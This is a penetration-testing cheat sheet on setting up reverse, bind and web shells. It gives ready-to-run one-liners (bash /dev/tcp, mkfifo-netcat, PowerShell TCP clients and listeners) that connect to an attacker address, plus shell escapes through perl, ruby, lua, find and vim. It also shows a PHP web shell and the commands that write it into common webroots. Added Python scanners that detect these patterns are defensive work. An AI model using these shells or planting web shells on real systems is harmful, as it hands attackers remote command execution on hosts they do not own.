Setting up Shells
This is a collection of a few useful scripts for creating reverse, bind and web shells.
Reverse Shells:
Preparing the shell script:
Linux target:
$ bash -c 'bash -i >& /dev/tcp/1.1.1.1/PORT 0>&1'
# OR
$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ATTACKING IP> <LISTENING PORT> >/tmp/f
If the payloads above don't work, or the target only offers a language other than bash or PHP to run the script/code, other resources online list equivalent one-liners for those languages.
Windows Target:
target-host> powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('1.1.1.1',PORT);$s = $client.GetStream();[byte[]]$b = 0..65535|%{0};while(($i = $s.Read($b, 0, $b.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$sb = (iex $data 2>&1 | Out-String );$sb2 = $sb + 'PS ' + (pwd).Path + '> ';$sbt = ([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sbt,0,$sbt.Length);$s.Flush()};$client.Close()"
Setting up a listener on our attacking machine:
Using netcat
attacking-machine$ nc -lvnp 1234
-l Listen mode.
-v Verbose mode.
-n Disable DNS resolution and only connect from/to IPs, to speed up the connection.
-p 1234 Port number netcat is listening on.
Using metasploit
msf6 > use multi/handler
msf6 exploit(multi/handler) > show options
msf6 exploit(multi/handler) > set LHOST 10.10.14.5
msf6 exploit(multi/handler) > set LPORT 1337
msf6 exploit(multi/handler) > run
Results of the injection:
attacker@attacking-machine$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [1.1.1.1] from (UNKNOWN) [10.10.10.10] 41572
victim@target-host> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
We successfully got a connection back; now it's time to make it more stable and efficient.
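For the defender's side of these one-liners, here is an added example (not part of the original page) that matches process command lines against the reverse-shell, bind-shell and TTY-upgrade patterns shown on this page; the rule names and the sample command lines are constructed for illustration.

```python
import re
from typing import NamedTuple

# Each rule is a name plus a regex derived from a one-liner on this page (rule names are mine).
RULES = [
    ("bash_dev_tcp", re.compile(r"bash\s+-i\s*>&\s*/dev/tcp/\S+\s+0>&1")),
    ("mkfifo_nc_pipe", re.compile(r"mkfifo\s+\S+.*\|\s*(?:/bin/)?(?:ba)?sh\s+-i.*\|\s*nc\b")),
    ("ps_tcpclient_iex", re.compile(r"TCPClient\(.*GetStream\(\).*\biex\b", re.I)),
    ("ps_tcplistener_iex", re.compile(r"TcpListener\].*AcceptTcpClient\(\).*\biex\b", re.I)),
    ("pty_spawn_upgrade", re.compile(r"import\s+pty;\s*pty\.spawn\(")),
]

class Finding(NamedTuple):
    line_no: int   # 1-based index into the scanned command list
    rule: str
    cmdline: str

def scan_cmdlines(cmdlines):
    """Return one Finding per command line that matches a rule (first matching rule wins)."""
    findings = []
    for n, cmd in enumerate(cmdlines, 1):
        for name, rx in RULES:
            if rx.search(cmd):
                findings.append(Finding(n, name, cmd.strip()))
                break
    return findings

# Constructed sample of process command lines (as an auditd execve or EDR feed would show them).
SAMPLE_CMDLINES = [
    "bash -c 'bash -i >& /dev/tcp/1.1.1.1/4444 0>&1'",
    "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 1.1.1.1 1234 >/tmp/f",
    "python3 -c 'import pty; pty.spawn(\"/bin/bash\")'",
    "grep -r 'ERROR' /var/log/apache2/",
    "bash -c 'tar czf /tmp/backup.tgz /var/www/html'",
    "powershell -nop -c \"$client = New-Object System.Net.Sockets.TCPClient('1.1.1.1',443);"
    "$s = $client.GetStream();$sb = (iex $data 2>&1 | Out-String)\"",
]

if __name__ == "__main__":
    for f in scan_cmdlines(SAMPLE_CMDLINES):
        print(f"line {f.line_no}: {f.rule}: {f.cmdline}")
```

These regexes only catch the literal shapes on this page; a real detection would also alert on a shell process whose stdin/stdout is a socket, whatever command line spawned it.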
Interactive Shells
In order to upgrade our shell to a full TTY, let's follow these steps:
Full TTY
victim@target-host$ python3 -c 'import pty; pty.spawn("/bin/bash")'
victim@target-host$ ^Z
attacker@attacking-machine$ stty raw -echo && fg
[Enter]
[Enter]
victim@target-host$
# Terminal size :
victim@target-host$ export TERM=xterm-256color
victim@target-host$ stty rows 67 columns 318
Raw mode: characters are delivered to the application as soon as they are typed, without any line buffering or special interpretation (such as Ctrl+C for interrupt).
-echo: By turning off echoing, characters typed by the user won't be displayed on the screen.
Now we can use the full terminal features.
Intuitively, since we're executing commands on a target machine, everything we can do depends directly on the permissions of the files and binaries we're able to execute. So?
sudo -l is your way in on easy boxes 😄
Bash
victim@target$ /bin/sh -i
sh: no job control in this shell
sh-4.2$
Perl
victim@target$ perl -e 'exec "/bin/sh";'
# To be run inside of a perl script:
exec "/bin/sh";
Ruby
victim@target$ ruby -e 'exec "/bin/sh"'
Lua
victim@target$ lua -e 'os.execute("/bin/sh")'
Find
victim@target$ find / -name nameoffile -exec /bin/awk 'BEGIN {system("/bin/sh")}' \;
# Example:
find . -exec /bin/sh \; -quit
Vim
victim@target$ vim -c ':!/bin/sh'
victim@target$ vim
:set shell=/bin/sh
:shell
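The list above is also an audit checklist: a sudoers rule that grants any of these binaries can be turned into a root shell. As an added example (not part of the original page), this Python parses `sudo -l` output and flags such rules; the sample output is constructed, and the rule format assumed is the one sudo prints, "(runas) [TAG:] command".

```python
import os
import re
from dataclasses import dataclass

# Binaries this page shows handing over a shell (awk included because the find example calls it).
SHELL_ESCAPE_BINS = {"sh", "bash", "perl", "ruby", "lua", "find", "awk", "vim"}

# One sudoers rule as printed by `sudo -l`: "(runas) [TAG: ...] command [args]".
RULE_RX = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*?)\s*$")

@dataclass
class SudoRule:
    runas: str
    nopasswd: bool
    command: str
    escape: bool   # True when the rule can be turned into an interactive shell

def parse_sudo_l(output):
    """Parse the command section of `sudo -l` output into SudoRule objects."""
    rules, in_commands = [], False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_commands = True
            continue
        m = RULE_RX.match(line) if in_commands else None
        if not m:
            continue
        cmd = m.group("cmd")
        binary = os.path.basename(cmd.split()[0])
        escape = cmd == "ALL" or binary in SHELL_ESCAPE_BINS
        rules.append(SudoRule(m.group("runas").strip(), "NOPASSWD" in m.group("tags"), cmd, escape))
    return rules

def risky_rules(output):
    """Rules an auditor should remove or restrict: anything that can escape to a shell."""
    return [r for r in parse_sudo_l(output) if r.escape]

# Constructed `sudo -l` output for illustration; not taken from a real host.
SAMPLE_SUDO_L = """\
Matching Defaults entries for www-data on target-host:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User www-data may run the following commands on target-host:
    (ALL) NOPASSWD: /usr/bin/find
    (root) /usr/bin/vim /etc/hosts
    (ALL : ALL) NOPASSWD: /usr/bin/perl
    (root) NOPASSWD: /usr/bin/rsync
    (root) NOPASSWD: /usr/sbin/service apache2 restart
"""

if __name__ == "__main__":
    for r in risky_rules(SAMPLE_SUDO_L):
        print(f"{r.command!r} as ({r.runas}) nopasswd={r.nopasswd}")
```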
Bind shells:
Listener on the target machine:
Linux Target:
$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 1234 >/tmp/f
Windows target:
target-host> powershell -NoP -NonI -W Hidden -Exec Bypass -Command $listener = [System.Net.Sockets.TcpListener]1234; $listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + " ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();
Connecting to the target:
$ nc 10.10.10.10 1234
# Successful connection a shell is now open:
victim@target-host> id # Our command; on a Windows target we would send a cmdlet instead
uid=33(www-data) gid=33(www-data) groups=33(www-data) # server response
We successfully got a remote shell on the target machine. If it is an unstable and "featureless" terminal, we can upgrade it to a full TTY as described in the Reverse Shells section.
Web Shells
For more Web Shell techniques and scripts, have a look at this.
Preparing the file
<?php system($_REQUEST["cmd"]); ?>
Injecting to the webroot
Apache: /var/www/html/
Nginx: /usr/local/nginx/html/
IIS: c:\inetpub\wwwroot\
XAMPP: C:\xampp\htdocs\
We can check these directories to see which webroot is in use and then use echo to write out our web shell. For example, if we are attacking a Linux host running Apache, we can write a PHP shell with the following command:
$ echo '<?php system($_REQUEST["cmd"]); ?>' > /var/www/html/shell.php
Execution
Visit the shell.php page on the compromised website and append ?cmd=id to execute the id command:
http://SERVER_IP:PORT/shell.php?cmd=id
We'll get the result of the id command on the web page! Or use the curl command:
$ curl http://SERVER_IP:PORT/shell.php?cmd=id
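As an added defensive counterpart (not part of the original page), the following Python scans a webroot for PHP files of the shape shown above and picks out access-log requests that pass a cmd= parameter to a PHP script; the webroot contents and log lines are constructed sample data, and the regexes are my own.

```python
import os
import re
import tempfile
from pathlib import Path

# PHP that passes raw request input straight to a command-execution function,
# the shape of the one-line web shell shown above.
WEBSHELL_RX = re.compile(
    r"\b(?:system|exec|shell_exec|passthru|popen|proc_open)\s*\(\s*\$_(?:REQUEST|GET|POST)\b")
# Access-log request whose query string carries a cmd= parameter to a .php script.
CMD_PARAM_RX = re.compile(r'"(?:GET|POST) (\S+\.php)\?(?:[^ "]*&)?cmd=([^ &"]*)')

def scan_webroot(root):
    """Return webroot-relative paths of PHP files whose source matches WEBSHELL_RX."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".php", ".phtml", ".php5")):
                continue
            path = Path(dirpath, name)
            try:
                text = path.read_text(errors="replace")
            except OSError:
                continue
            if WEBSHELL_RX.search(text):
                hits.append(path.relative_to(root).as_posix())
    return sorted(hits)

def suspicious_requests(log_lines):
    """(script, command) pairs for access-log lines that hit a PHP script with ?cmd=."""
    return [(m.group(1), m.group(2)) for line in log_lines if (m := CMD_PARAM_RX.search(line))]

def demo():
    """Scan a constructed webroot and constructed access-log lines (sample data, not a real host)."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "index.php").write_text("<?php echo 'Hello ' . htmlspecialchars($_GET['name']); ?>")
        (root / "img").mkdir()
        (root / "img" / "shell.php").write_text('<?php system($_REQUEST["cmd"]); ?>')
        files = scan_webroot(root)
    logs = [
        '10.10.14.5 - - [01/Jan/2024:12:00:00 +0000] "GET /index.php?name=bob HTTP/1.1" 200 512',
        '10.10.14.5 - - [01/Jan/2024:12:00:03 +0000] "GET /img/shell.php?cmd=id HTTP/1.1" 200 61',
        '10.10.14.5 - - [01/Jan/2024:12:00:09 +0000] "GET /img/shell.php?x=1&cmd=whoami HTTP/1.1" 200 9',
    ]
    return files, suspicious_requests(logs)
```

Point scan_webroot at one of the webroots listed above on a real host; the file check catches the one-liner shape only, so it complements rather than replaces integrity monitoring of the webroot.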